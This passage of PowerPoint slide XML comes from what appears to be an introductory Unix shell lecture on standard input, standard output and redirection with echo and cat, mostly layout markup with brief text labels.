              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C53C358-2B72-4BAB-A0E3-60E4D8B801E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61192" y="4779037"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Elbow Connector 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECF64E2B-67BE-486D-8D10-C772477498DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1620877" y="4672476"/>
            <a:ext cx="1267883" cy="61629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756F8C3-3F4E-45B7-BE04-DD7F97537D17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2607073" y="4147440"/>
            <a:ext cx="743192" cy="7850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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Straight Arrow Connector 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D77B53-BE89-4FFD-BF82-B11ACA988712}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="5" idx="7"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2334128" y="3508684"/>
            <a:ext cx="658544" cy="235440"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD4FB5A9-3D63-1490-9F12-FA8A4270B582}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407573" y="1392572"/>
            <a:ext cx="3251200" cy="469900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>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969276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Standard output: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stdout</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Oval 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631527" y="2333144"/>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echo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2648908" y="2876960"/>
            <a:ext cx="1141554" cy="12333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sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604877" y="2238001"/>
            <a:ext cx="1415772" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5455421" y="2055336"/>
            <a:ext cx="5982535" cy="2730881"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Graphic 3" descr="Document outline">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53BBAAEF-47FD-4233-BA5D-FEFD81D7C15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94964" y="2543090"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87D0A159-7E14-4BF7-9CB0-3297C5F40739}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4313866" y="3070628"/>
            <a:ext cx="1141554" cy="12333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p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Graphic 2" descr="Document outline">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BCCEF90-E352-1AA6-AF03-BD9A49205B5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7681" y="3985846"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EE24E55-EC09-A96F-1CAC-D881D36537A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="5" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1527777" y="3420776"/>
            <a:ext cx="112441" cy="642456"/>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6" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7166D24-8FC4-F263-22CA-7A0BD1ACF199}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1058723" y="3489398"/>
            <a:ext cx="1428596" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0&lt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE8C9AD7-C4A6-D958-F5F0-30F414F05EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8044405" y="1296365"/>
            <a:ext cx="2750240" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>default input and output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Arrow Connector 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9ECA26E-7BFF-984F-990C-A347AA865302}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7917084" y="1696475"/>
            <a:ext cx="1502441" cy="63666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8" name="TextBox 17"/>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089025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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="568379" y="2027765"/>
            <a:ext cx="5759451" cy="3778287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6533576" y="1721271"/>
            <a:ext cx="5658424" cy="4084780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>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435293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Standard input: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stdin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Oval 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956063" y="2631367"/>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="5" idx="7"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2678006" y="2324375"/>
            <a:ext cx="3856556" cy="46627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3364261" y="2175094"/>
            <a:ext cx="1428596" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0&lt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6633725" y="1345083"/>
            <a:ext cx="4801271" cy="2070389"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="852426" y="4395675"/>
            <a:ext cx="10860345" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Display the content of a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>tell cat to take input from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>myfile.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>directly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Send the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>myflle.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>content to input device,  tell cat to take input from the device, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Same as 2 (0 is a default input device)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Graphic 9" descr="Document outline">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2039D276-9706-43EB-83A2-1A66F8880AE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95387" y="2005125"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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0682F64C-86ED-FDF8-AC44-630D4AC5A445}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="857247" y="5603002"/>
              <a:ext cx="402840" cy="352440"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="15" name="Ink 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0682F64C-86ED-FDF8-AC44-630D4AC5A445}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId6"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="848607" y="5594362"/>
                <a:ext cx="420480" cy="370080"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA2092D9-41BB-35DA-110D-05E0D7227419}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="871287" y="2089762"/>
            <a:ext cx="7209000" cy="3651120"/>
            <a:chOff x="871287" y="2089762"/>
            <a:chExt cx="7209000" cy="3651120"/>
          </a:xfrm>
        </p:grpSpPr>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60A42CD-C9C2-4F3C-EA82-08FC10F02016}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="871287" y="5149402"/>
                <a:ext cx="339480" cy="317880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="7" name="Ink 6">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{960A42CD-C9C2-4F3C-EA82-08FC10F02016}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId8"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="862287" y="5140402"/>
                  <a:ext cx="35712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26BCBAFC-B799-8E38-6A3E-E2C84191B8C7}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1264767" y="2206042"/>
                <a:ext cx="6792840" cy="2998440"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="8" name="Ink 7">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26BCBAFC-B799-8E38-6A3E-E2C84191B8C7}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId10"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1255767" y="2197042"/>
                  <a:ext cx="6810480" cy="3016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D462BE2A-6A73-B7B3-A568-77DA09958A48}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7918287" y="2089762"/>
                <a:ext cx="118080" cy="245520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="13" name="Ink 12">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D462BE2A-6A73-B7B3-A568-77DA09958A48}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId12"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7909287" y="2081122"/>
                  <a:ext cx="13572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D408BFF6-7043-3711-DEA9-6EC294C297C5}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1305807" y="2765842"/>
                <a:ext cx="6753240" cy="2975040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="16" name="Ink 15">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D408BFF6-7043-3711-DEA9-6EC294C297C5}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId14"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1297167" y="2756842"/>
                  <a:ext cx="6770880" cy="2992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1BC7AFB8-97AF-83CE-D450-18CEBF7C5B06}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7940607" y="2694922"/>
                <a:ext cx="139680" cy="95760"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="18" name="Ink 17">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BC7AFB8-97AF-83CE-D450-18CEBF7C5B06}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId16"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7931607" y="2686282"/>
                  <a:ext cx="157320" cy="113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
            <p14:nvContentPartPr>
              <p14:cNvPr id="20" name="Ink 19">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8355774-87A5-919B-E69E-1F51DDFC4A58}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2825367" y="-49718"/>
              <a:ext cx="3240" cy="1440"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="20" name="Ink 19">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8355774-87A5-919B-E69E-1F51DDFC4A58}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId18"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2816727" y="-58358"/>
                <a:ext cx="208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1" name="Ink 20">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4E34C17-51EA-F1E7-199C-A0E5A43F3001}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="8119167" y="714922"/>
              <a:ext cx="360" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="21" name="Ink 20">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4E34C17-51EA-F1E7-199C-A0E5A43F3001}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId20"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="8110527" y="705922"/>
                <a:ext cx="18000" cy="18000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
